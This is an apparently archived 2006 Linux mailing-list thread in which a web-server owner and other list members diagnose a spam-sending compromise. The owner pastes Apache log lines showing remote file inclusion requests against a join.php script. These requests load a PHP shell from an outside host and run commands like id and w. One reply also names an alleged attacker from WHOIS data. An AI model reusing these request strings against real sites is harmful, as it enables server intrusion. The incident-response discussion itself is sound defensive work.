-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
On Tue, 23 May 2006, Les Mikesell wrote:
On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
An old version of awstats will get you into this club, as will some of the php based forum programs.
All it takes is for someone to install one of these in a document root and not keep up with the updates. It is insanely trivial to exploit one of these boxes. It even gets logged in the http logs for all to see. The hardest part if figuring out when it actually happened so you can find it in the logs.
If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
I suspect if ssh had been compromised that the user would have been something other than apache. The passwd entry for apache generally looks something like this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh login as apache would not be possible via brute force passwd attack vectors.
Regards,
Tom Diehl tdiehl@rogueind.com Spamtrap address mtd123@rogueind.com
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 09:27:01 -0400 (EDT) Tom Diehl tdiehl@rogueind.com wrote:
On Tue, 23 May 2006, Les Mikesell wrote:
On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
An old version of awstats will get you into this club, as will some of the php based forum programs.
All it takes is for someone to install one of these in a document root and not keep up with the updates. It is insanely trivial to exploit one of these boxes. It even gets logged in the http logs for all to see. The hardest part if figuring out when it actually happened so you can find it in the logs.
If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
I suspect if ssh had been compromised that the user would have been something other than apache. The passwd entry for apache generally looks something like this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh login as apache would not be possible via brute force passwd attack vectors.
Regards,
Tom Diehl tdiehl@rogueind.com Spamtrap address mtd123@rogueind.com
I looked in those logs and there is none of that. I have ssh turned off and sudo uninstalled.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 08:00:06 -0500 Les Mikesell lesmikesell@gmail.com wrote:
On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
ssh is turned off.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few. 81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
AOL: 172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374 172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412 172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few. 81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
AOL: 172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374 172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412 172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
Looks like an exploit of a cross-site scripting vulnerability in your join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP script that gets injected into your form, it's not an image at all.
You need to turn off that form until you can get a fixed version of that application. And of course reinstall that system.
Paul.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth paul@city-fan.org wrote:
On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few. 81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
AOL: 172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374 172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412 172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
Looks like an exploit of a cross-site scripting vulnerability in your join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP script that gets injected into your form, it's not an image at all.
You need to turn off that form until you can get a fixed version of that application. And of course reinstall that system.
Paul.
Thanks Paul, That is what I thought. I am writing my own topsites anyway, so that is no big deal. I will be deleting the other one.
CodeHeads wrote:
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
The registrar and registrant are both in France, and yes it is illegal.
The criminal's name is Canale Jeremy and he lives in Paris.
His fake registrant contact data should be enough to have his domain shut down, if you LART him upstream, citing false/incomplete contact data as the complaint:
###### Much of what follows is fake or incomplete ###### Server Used: [ whois.ovh.com ]
xpl.netmisphere2.com = [ 82.237.120.143 ]
local time : Monday 05-Jun-2006 03: 16: 38 CEST last modified : Saturday 29-Oct-2005 00: 24: 16 CEST domaine : netmisphere2.com request from : 206.117.161.80: 3939 domain: NETMISPHERE2.COM owner: person: Canale Jeremy address: xxx adresse: PAris 74 007 adresse: FR phone: 17 fax: cddc@cdcd.cdee
admin-c: CJ6263-OVH tech-c: CJ6263-OVH bill-c: CJ6263-OVH nserver: ns1.netmisphere2.com nserver: ns2.sivit.org created: 2005-07-07 14: 00: 00 expires: 2006-07-07 20: 57: 50 changed: 2005-07-07 21: 16: 07 nic-hdl: CJ6263-OVH person: jtemmerde pffff organisation: T-nul address: chez ta mere address: Obernai 16 prout adresse: FR phone: 17 fax: cdcd@fefe.com
created: 2005-07-07 20: 52: 03 changed: 2005-10-29 00: 21: 14 ############
###### But he can't hide his upstream provider ###### role: Administrative Contact for ProXad address: Free SAS / ProXad address: 8, rue de la Ville L'Eveque address: 75008 Paris phone: +33 1 73 50 20 00 fax-no: +33 1 73 50 25 01 remarks: trouble: Information: http://www.proxad.net/ remarks: trouble: Spam/Abuse requests: abuse[AT]proxad.net ############
-
CodeHeads -
Keith G. Robertson-Turner -
Les Mikesell -
Paul Howarth -
Tom Diehl